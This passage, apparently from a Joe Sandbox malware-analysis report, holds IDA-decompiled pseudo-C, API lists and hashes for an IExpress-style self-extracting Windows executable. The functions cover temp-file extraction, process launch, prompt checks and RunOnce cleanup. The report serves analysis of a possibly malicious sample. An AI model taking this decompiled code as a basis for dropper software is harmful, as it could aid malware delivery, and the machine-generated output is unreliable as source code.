                                                                        				signed int* _t25;
                                                                        				signed int _t26;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				signed int _t37;
                                                                        				signed char _t41;
                                                                        				signed int _t53;
                                                                        				signed int _t54;
                                                                        				intOrPtr _t56;
                                                                        				signed int _t58;
                                                                        				signed int _t59;
                                                                        				intOrPtr* _t60;
                                                                        				void* _t62;
                                                                        				void* _t67;
                                                                        				void* _t68;
                                                                        
                                                                        				E003D7155();
                                                                        				_push(0x58);
                                                                        				_push(0x3d72b8);
                                                                        				E003D7208(__ebx, __edi, __esi);
                                                                        				 *(_t62 - 0x20) = 0;
                                                                        				GetStartupInfoW(_t62 - 0x68);
                                                                        				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                        				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                        				_t53 = 0;
                                                                        				while(1) {
                                                                        					asm("lock cmpxchg [edx], ecx");
                                                                        					if(0 == 0) {
                                                                        						break;
                                                                        					}
                                                                        					if(0 != _t56) {
                                                                        						Sleep(0x3e8);
                                                                        						continue;
                                                                        					} else {
                                                                        						_t58 = 1;
                                                                        						_t53 = 1;
                                                                        					}
                                                                        					L7:
                                                                        					_t67 =  *0x3d88b0 - _t58; // 0x2
                                                                        					if(_t67 != 0) {
                                                                        						__eflags =  *0x3d88b0; // 0x2
                                                                        						if(__eflags != 0) {
                                                                        							 *0x3d81e4 = _t58;
                                                                        							goto L13;
                                                                        						} else {
                                                                        							 *0x3d88b0 = _t58;
                                                                        							_t37 = E003D6C3F(0x3d10b8, 0x3d10c4); // executed
                                                                        							__eflags = _t37;
                                                                        							if(__eflags == 0) {
                                                                        								goto L13;
                                                                        							} else {
                                                                        								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        								_t30 = 0xff;
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						_push(0x1f);
                                                                        						L003D6FF4();
                                                                        						L13:
                                                                        						_t68 =  *0x3d88b0 - _t58; // 0x2
                                                                        						if(_t68 == 0) {
                                                                        							_push(0x3d10b4);
                                                                        							_push(0x3d10ac);
                                                                        							L003D7202();
                                                                        							 *0x3d88b0 = 2;
                                                                        						}
                                                                        						if(_t53 == 0) {
                                                                        							 *0x3d88ac = 0;
                                                                        						}
                                                                        						_t71 =  *0x3d88b4;
                                                                        						if( *0x3d88b4 != 0 && E003D7060(_t71, 0x3d88b4) != 0) {
                                                                        							_t60 =  *0x3d88b4; // 0x0
                                                                        							 *0x3da288(0, 2, 0);
                                                                        							 *_t60();
                                                                        						}
                                                                        						_t25 = __imp___acmdln; // 0x76725b9c
                                                                        						_t59 =  *_t25;
                                                                        						 *(_t62 - 0x1c) = _t59;
                                                                        						_t54 =  *(_t62 - 0x20);
                                                                        						while(1) {
                                                                        							_t41 =  *_t59;
                                                                        							if(_t41 > 0x20) {
                                                                        								goto L32;
                                                                        							}
                                                                        							if(_t41 != 0) {
                                                                        								if(_t54 != 0) {
                                                                        									goto L32;
                                                                        								} else {
                                                                        									while(_t41 != 0 && _t41 <= 0x20) {
                                                                        										_t59 = _t59 + 1;
                                                                        										 *(_t62 - 0x1c) = _t59;
                                                                        										_t41 =  *_t59;
                                                                        									}
                                                                        								}
                                                                        							}
                                                                        							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                        							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                        								_t29 = 0xa;
                                                                        							} else {
                                                                        								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                        							}
                                                                        							_push(_t29);
                                                                        							_t30 = E003D2BFB(0x3d0000, 0, _t59); // executed
                                                                        							 *0x3d81e0 = _t30;
                                                                        							__eflags =  *0x3d81f8;
                                                                        							if( *0x3d81f8 == 0) {
                                                                        								exit(_t30); // executed
                                                                        								goto L32;
                                                                        							}
                                                                        							__eflags =  *0x3d81e4;
                                                                        							if( *0x3d81e4 == 0) {
                                                                        								__imp___cexit();
                                                                        								_t30 =  *0x3d81e0; // 0x0
                                                                        							}
                                                                        							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                        							goto L40;
                                                                        							L32:
                                                                        							__eflags = _t41 - 0x22;
                                                                        							if(_t41 == 0x22) {
                                                                        								__eflags = _t54;
                                                                        								_t15 = _t54 == 0;
                                                                        								__eflags = _t15;
                                                                        								_t54 = 0 | _t15;
                                                                        								 *(_t62 - 0x20) = _t54;
                                                                        							}
                                                                        							_t26 = _t41 & 0x000000ff;
                                                                        							__imp___ismbblead(_t26);
                                                                        							__eflags = _t26;
                                                                        							if(_t26 != 0) {
                                                                        								_t59 = _t59 + 1;
                                                                        								__eflags = _t59;
                                                                        								 *(_t62 - 0x1c) = _t59;
                                                                        							}
                                                                        							_t59 = _t59 + 1;
                                                                        							 *(_t62 - 0x1c) = _t59;
                                                                        						}
                                                                        					}
                                                                        					L40:
                                                                        					return E003D724D(_t30);
                                                                        				}
                                                                        				_t58 = 1;
                                                                        				__eflags = 1;
                                                                        				goto L7;
                                                                        			}



















                                                                        APIs
                                                                          • Part of subcall function 003D7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 003D7182
                                                                          • Part of subcall function 003D7155: GetCurrentProcessId.KERNEL32 ref: 003D7191
                                                                          • Part of subcall function 003D7155: GetCurrentThreadId.KERNEL32 ref: 003D719A
                                                                          • Part of subcall function 003D7155: GetTickCount.KERNEL32 ref: 003D71A3
                                                                          • Part of subcall function 003D7155: QueryPerformanceCounter.KERNEL32(?), ref: 003D71B8
                                                                        • GetStartupInfoW.KERNEL32(?,003D72B8,00000058), ref: 003D6A7F
                                                                        • Sleep.KERNEL32(000003E8), ref: 003D6AB4
                                                                        • _amsg_exit.MSVCRT ref: 003D6AC9
                                                                        • _initterm.MSVCRT ref: 003D6B1D
                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 003D6B49
                                                                        • exit.KERNELBASE ref: 003D6BBF
                                                                        • _ismbblead.MSVCRT ref: 003D6BDA
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                        • String ID:
                                                                        • API String ID: 836923961-0
                                                                        • Opcode ID: 90abef83da5720d0132e3d1e85650cb987141b3a383e64ad997d4c1c8cec5d07
                                                                        • Instruction ID: 23e5585113e4e6c3dbbb103b7d2741f1421091069ba5e8eb7052765ea1df6969
                                                                        • Opcode Fuzzy Hash: 90abef83da5720d0132e3d1e85650cb987141b3a383e64ad997d4c1c8cec5d07
                                                                        • Instruction Fuzzy Hash: 6C4112739497649FDB239B6AFD067AA77E8FB44720F25001BE861E7390CB745840CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        control_flow_graph 587 3d58c8-3d58d5 588 3d58d8-3d58dd 587->588 588->588 589 3d58df-3d58f1 LocalAlloc 588->589 590 3d5919-3d5959 call 3d1680 call 3d658a CreateFileA LocalFree 589->590 591 3d58f3-3d5901 call 3d44b9 589->591 595 3d5906-3d5910 call 3d6285 590->595 601 3d595b-3d596c CloseHandle GetFileAttributesA 590->601 591->595 600 3d5912-3d5918 595->600 601->595 602 3d596e-3d5970 601->602 602->595 603 3d5972-3d597b 602->603 603->600
                                                                        C-Code - Quality: 95%
                                                                        			E003D58C8(intOrPtr* __ecx) {
                                                                        				void* _v8;
                                                                        				intOrPtr _t6;
                                                                        				void* _t10;
                                                                        				void* _t12;
                                                                        				void* _t14;
                                                                        				signed char _t16;
                                                                        				void* _t20;
                                                                        				void* _t23;
                                                                        				intOrPtr* _t27;
                                                                        				CHAR* _t33;
                                                                        
                                                                        				_push(__ecx);
                                                                        				_t33 = __ecx;
                                                                        				_t27 = __ecx;
                                                                        				_t23 = __ecx + 1;
                                                                        				do {
                                                                        					_t6 =  *_t27;
                                                                        					_t27 = _t27 + 1;
                                                                        				} while (_t6 != 0);
                                                                        				_t36 = _t27 - _t23 + 0x14;
                                                                        				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14);
                                                                        				if(_t20 != 0) {
                                                                        					E003D1680(_t20, _t36, _t33);
                                                                        					E003D658A(_t20, _t36, "TMP4351$.TMP");
                                                                        					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
                                                                        					_v8 = _t10;
                                                                        					LocalFree(_t20);
                                                                        					_t12 = _v8;
                                                                        					if(_t12 == 0xffffffff) {
                                                                        						goto L4;
                                                                        					} else {
                                                                        						CloseHandle(_t12);
                                                                        						_t16 = GetFileAttributesA(_t33); // executed
                                                                        						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
                                                                        							goto L4;
                                                                        						} else {
                                                                        							 *0x3d9124 = 0;
                                                                        							_t14 = 1;
                                                                        						}
                                                                        					}
                                                                        				} else {
                                                                        					E003D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        					L4:
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					_t14 = 0;
                                                                        				}
                                                                        				return _t14;
                                                                        			}














                                                                        APIs
                                                                        • LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,003D5534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D58E7
                                                                        • CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,003D5534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5943
                                                                        • LocalFree.KERNEL32(00000000,?,003D5534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D594D
                                                                        • CloseHandle.KERNEL32(00000000,?,003D5534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D595C
                                                                        • GetFileAttributesA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,?,003D5534,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000001,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\,00000000), ref: 003D5963
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\$TMP4351$.TMP
                                                                        • API String ID: 747627703-3788082193
                                                                        • Opcode ID: 3e00bda287b35912ed71af9d36709761aadec67a5057c092d36dc8a92febeba4
                                                                        • Instruction ID: 747b23929e04c02dc98c836dc86a016c5e656653c3bb61662c00446acf1fc385
                                                                        • Opcode Fuzzy Hash: 3e00bda287b35912ed71af9d36709761aadec67a5057c092d36dc8a92febeba4
                                                                        • Instruction Fuzzy Hash: 1311D0736016206BC7265F7ABC4EB9B7B9DEF46360F104617B51AD6391CB70980586A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 631 3d3fef-3d4010 632 3d410a-3d411a call 3d6ce0 631->632 633 3d4016-3d403b CreateProcessA 631->633 634 3d40c4-3d4101 call 3d6285 GetLastError FormatMessageA call 3d44b9 633->634 635 3d4041-3d406e WaitForSingleObject GetExitCodeProcess 633->635 650 3d4106 634->650 637 3d4091 call 3d411b 635->637 638 3d4070-3d4077 635->638 645 3d4096-3d40b8 CloseHandle * 2 637->645 638->637 641 3d4079-3d407b 638->641 641->637 644 3d407d-3d4089 641->644 644->637 647 3d408b 644->647 648 3d4108 645->648 649 3d40ba-3d40c0 645->649 647->637 648->632 649->648 651 3d40c2 649->651 650->648 651->650
                                                                        C-Code - Quality: 84%
                                                                        			E003D3FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v524;
                                                                        				long _v528;
                                                                        				struct _PROCESS_INFORMATION _v544;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t20;
                                                                        				void* _t22;
                                                                        				int _t25;
                                                                        				intOrPtr* _t39;
                                                                        				signed int _t44;
                                                                        				void* _t49;
                                                                        				signed int _t50;
                                                                        				intOrPtr _t53;
                                                                        
                                                                        				_t45 = __edx;
                                                                        				_t20 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t20 ^ _t50;
                                                                        				_t39 = __ecx;
                                                                        				_t49 = 1;
                                                                        				_t22 = 0;
                                                                        				if(__ecx == 0) {
                                                                        					L13:
                                                                        					return E003D6CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
                                                                        				}
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				asm("stosd");
                                                                        				_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
                                                                        				if(_t25 == 0) {
                                                                        					 *0x3d9124 = E003D6285();
                                                                        					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
                                                                        					_t45 = 0x4c4;
                                                                        					E003D44B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
                                                                        					L11:
                                                                        					_t49 = 0;
                                                                        					L12:
                                                                        					_t22 = _t49;
                                                                        					goto L13;
                                                                        				}
                                                                        				WaitForSingleObject(_v544.hProcess, 0xffffffff);
                                                                        				_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
                                                                        				_t44 = _v528;
                                                                        				_t53 =  *0x3d8a28; // 0x0
                                                                        				if(_t53 == 0) {
                                                                        					_t34 =  *0x3d9a2c; // 0x0
                                                                        					if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
                                                                        						_t34 = _t44 & 0xff000000;
                                                                        						if((_t44 & 0xff000000) == 0xaa000000) {
                                                                        							 *0x3d9a2c = _t44;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				E003D411B(_t34, _t44);
                                                                        				CloseHandle(_v544.hThread);
                                                                        				CloseHandle(_v544);
                                                                        				if(( *0x3d9a34 & 0x00000400) == 0 || _v528 >= 0) {
                                                                        					goto L12;
                                                                        				} else {
                                                                        					goto L11;
                                                                        				}
                                                                        			}



















                                                                        APIs
                                                                        • CreateProcessA.KERNELBASE ref: 003D4033
                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003D4049
                                                                        • GetExitCodeProcess.KERNELBASE ref: 003D405C
                                                                        • CloseHandle.KERNEL32(?), ref: 003D409C
                                                                        • CloseHandle.KERNEL32(?), ref: 003D40A8
                                                                        • GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 003D40DC
                                                                        • FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 003D40E9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                        • String ID:
                                                                        • API String ID: 3183975587-0
                                                                        • Opcode ID: 007710367998de4b3b1279225c007154dcac2d74c8506d67d22cb3d53be0d83e
                                                                        • Instruction ID: 38bff6f28d49fc6d7661bcefe2d264421629164b21332b04497bd177de15a8b1
                                                                        • Opcode Fuzzy Hash: 007710367998de4b3b1279225c007154dcac2d74c8506d67d22cb3d53be0d83e
                                                                        • Instruction Fuzzy Hash: 1F31B472642618ABEB229F65FC49FABB77CEB94700F1001ABF545D6261C6308D85CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 652 3d51e5-3d520b call 3d468f LocalAlloc 655 3d522d-3d523c call 3d468f 652->655 656 3d520d-3d5228 call 3d44b9 call 3d6285 652->656 662 3d523e-3d5260 call 3d44b9 LocalFree 655->662 663 3d5262-3d5270 lstrcmpA 655->663 670 3d52b0 656->670 662->670 666 3d527e-3d529c call 3d44b9 LocalFree 663->666 667 3d5272-3d5273 LocalFree 663->667 674 3d529e-3d52a4 666->674 675 3d52a6 666->675 668 3d5279-3d527c 667->668 672 3d52b2-3d52b5 668->672 670->672 674->668 675->670
                                                                        C-Code - Quality: 100%
                                                                        			E003D51E5(void* __eflags) {
                                                                        				int _t5;
                                                                        				void* _t6;
                                                                        				void* _t28;
                                                                        
                                                                        				_t1 = E003D468F("UPROMPT", 0, 0) + 1; // 0x1
                                                                        				_t28 = LocalAlloc(0x40, _t1);
                                                                        				if(_t28 != 0) {
                                                                        					if(E003D468F("UPROMPT", _t28, _t29) != 0) {
                                                                        						_t5 = lstrcmpA(_t28, "<None>"); // executed
                                                                        						if(_t5 != 0) {
                                                                        							_t6 = E003D44B9(0, 0x3e9, _t28, 0, 0x20, 4);
                                                                        							LocalFree(_t28);
                                                                        							if(_t6 != 6) {
                                                                        								 *0x3d9124 = 0x800704c7;
                                                                        								L10:
                                                                        								return 0;
                                                                        							}
                                                                        							 *0x3d9124 = 0;
                                                                        							L6:
                                                                        							return 1;
                                                                        						}
                                                                        						LocalFree(_t28);
                                                                        						goto L6;
                                                                        					}
                                                                        					E003D44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                        					LocalFree(_t28);
                                                                        					 *0x3d9124 = 0x80070714;
                                                                        					goto L10;
                                                                        				}
                                                                        				E003D44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                        				 *0x3d9124 = E003D6285();
                                                                        				goto L10;
                                                                        			}







                                                                        APIs
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46A0
                                                                          • Part of subcall function 003D468F: SizeofResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46A9
                                                                          • Part of subcall function 003D468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003D46C3
                                                                          • Part of subcall function 003D468F: LoadResource.KERNEL32(00000000,00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46CC
                                                                          • Part of subcall function 003D468F: LockResource.KERNEL32(00000000,?,003D2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46D3
                                                                          • Part of subcall function 003D468F: memcpy_s.MSVCRT ref: 003D46E5
                                                                          • Part of subcall function 003D468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003D46EF
                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,003D2F4D,?,00000002,00000000), ref: 003D5201
                                                                        • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 003D5250
                                                                          • Part of subcall function 003D44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 003D4518
                                                                          • Part of subcall function 003D44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 003D4554
                                                                          • Part of subcall function 003D6285: GetLastError.KERNEL32(003D5BBC), ref: 003D6285
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                        • String ID: <None>$UPROMPT
                                                                        • API String ID: 957408736-2980973527
                                                                        • Opcode ID: 543654f6f59e2ddda130ad9fc88743b554e297defc03b2ce5be17661e5b3bddc
                                                                        • Instruction ID: 2d439bda4b814fbf92bb2db79ed389096e89dd703affd58bac59d5ade1fdd7c9
                                                                        • Opcode Fuzzy Hash: 543654f6f59e2ddda130ad9fc88743b554e297defc03b2ce5be17661e5b3bddc
                                                                        • Instruction Fuzzy Hash: 0211C8772026017BD3176BB1BD46F3B72ADEB89350F11482BF642D9790DA798C054124
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 74%
                                                                        			E003D52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				signed int _t9;
                                                                        				signed int _t11;
                                                                        				void* _t21;
                                                                        				void* _t29;
                                                                        				CHAR** _t31;
                                                                        				void* _t32;
                                                                        				signed int _t33;
                                                                        
                                                                        				_t28 = __edi;
                                                                        				_t22 = __ecx;
                                                                        				_t21 = __ebx;
                                                                        				_t9 =  *0x3d8004; // 0xf4fc83b5
                                                                        				_v8 = _t9 ^ _t33;
                                                                        				_push(__esi);
                                                                        				_t31 =  *0x3d91e0; // 0x2b58300
                                                                        				if(_t31 != 0) {
                                                                        					_push(__edi);
                                                                        					do {
                                                                        						_t29 = _t31;
                                                                        						if( *0x3d8a24 == 0 &&  *0x3d9a30 == 0) {
                                                                        							SetFileAttributesA( *_t31, 0x80); // executed
                                                                        							DeleteFileA( *_t31); // executed
                                                                        						}
                                                                        						_t31 = _t31[1];
                                                                        						LocalFree( *_t29);
                                                                        						LocalFree(_t29);
                                                                        					} while (_t31 != 0);
                                                                        					_pop(_t28);
                                                                        				}
                                                                        				_t11 =  *0x3d8a20; // 0x0
                                                                        				_pop(_t32);
                                                                        				if(_t11 != 0 &&  *0x3d8a24 == 0 &&  *0x3d9a30 == 0) {
                                                                        					_push(_t22);
                                                                        					E003D1781( &_v268, 0x104, _t22, "C:\Users\FRONTD~1\AppData\Local\Temp\IXP000.TMP\");
                                                                        					if(( *0x3d9a34 & 0x00000020) != 0) {
                                                                        						E003D65E8( &_v268);
                                                                        					}
                                                                        					SetCurrentDirectoryA(".."); // executed
                                                                        					_t22 =  &_v268;
                                                                        					E003D2390( &_v268);
                                                                        					_t11 =  *0x3d8a20; // 0x0
                                                                        				}
                                                                        				if( *0x3d9a40 != 1 && _t11 != 0) {
                                                                        					_t11 = E003D1FE1(_t22); // executed
                                                                        				}
                                                                        				 *0x3d8a20 =  *0x3d8a20 & 0x00000000;
                                                                        				return E003D6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
                                                                        			}













                                                                        APIs
                                                                        • SetFileAttributesA.KERNELBASE(02B58300,00000080,?,00000000), ref: 003D52F2
                                                                        • DeleteFileA.KERNELBASE(02B58300), ref: 003D52FA
                                                                        • LocalFree.KERNEL32(02B58300,?,00000000), ref: 003D5305
                                                                        • LocalFree.KERNEL32(02B58300), ref: 003D530C
                                                                        • SetCurrentDirectoryA.KERNELBASE(003D11FC,?,C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\), ref: 003D5363
                                                                        Strings
                                                                        • C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\, xrefs: 003D5334
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\
                                                                        • API String ID: 2833751637-1955631000
                                                                        • Opcode ID: 99f9aaf07a33bc60e95c22cc5f8d8485b5d4357cf71433f437ad5c7a34041428
                                                                        • Instruction ID: c5e48ecddcea2d82ac29a53068a3e1600b4b917c7491cbcf0b71e710ba2abae4
                                                                        • Opcode Fuzzy Hash: 99f9aaf07a33bc60e95c22cc5f8d8485b5d4357cf71433f437ad5c7a34041428
                                                                        • Instruction Fuzzy Hash: EB218E37912A14DFDB239F24FD09B6977A8BB14751F05015BE882563A0CFB46D98CB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E003D1FE1(void* __ecx) {
                                                                        				void* _v8;
                                                                        				long _t4;
                                                                        
                                                                        				if( *0x3d8530 != 0) {
                                                                        					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
                                                                        					if(_t4 == 0) {
                                                                        						RegDeleteValueA(_v8, "wextract_cleanup0"); // executed
                                                                        						return RegCloseKey(_v8);
                                                                        					}
                                                                        				}
                                                                        				return _t4;
                                                                        			}






                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,003D538C,?,?,003D538C), ref: 003D2005
                                                                        • RegDeleteValueA.KERNELBASE(003D538C,wextract_cleanup0,?,?,003D538C), ref: 003D2017
                                                                        • RegCloseKey.ADVAPI32(003D538C,?,?,003D538C), ref: 003D2020
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.322387437.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                                                                        • Associated: 00000000.00000002.322377006.00000000003D0000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322405861.00000000003D8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DA000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.322416085.00000000003DC000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                                                                        Similarity
                                                                        • API ID: CloseDeleteOpenValue
                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup0
                                                                        • API String ID: 849931509-702805525
                                                                        • Opcode ID: a0ca5cd15a7c5ddc84c575dc7f20b68439bec42985a3b2087f5adc44b97b6ff4
                                                                        • Instruction ID: 53f7f9aea2f92bbd19114d7b187a8e9a94504dd545a48e1c66ab58a621354bdc
                                                                        • Opcode Fuzzy Hash: a0ca5cd15a7c5ddc84c575dc7f20b68439bec42985a3b2087f5adc44b97b6ff4
                                                                        • Instruction Fuzzy Hash: A0E08632951318BBD7238F90FD0AF5A7B2EFB01740F100297F904A0160EB716E14E605
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 94%
                                                                        			E003D4CD0(char* __edx, long _a4, int _a8) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t29;
                                                                        				int _t30;
                                                                        				long _t32;
                                                                        				signed int _t33;
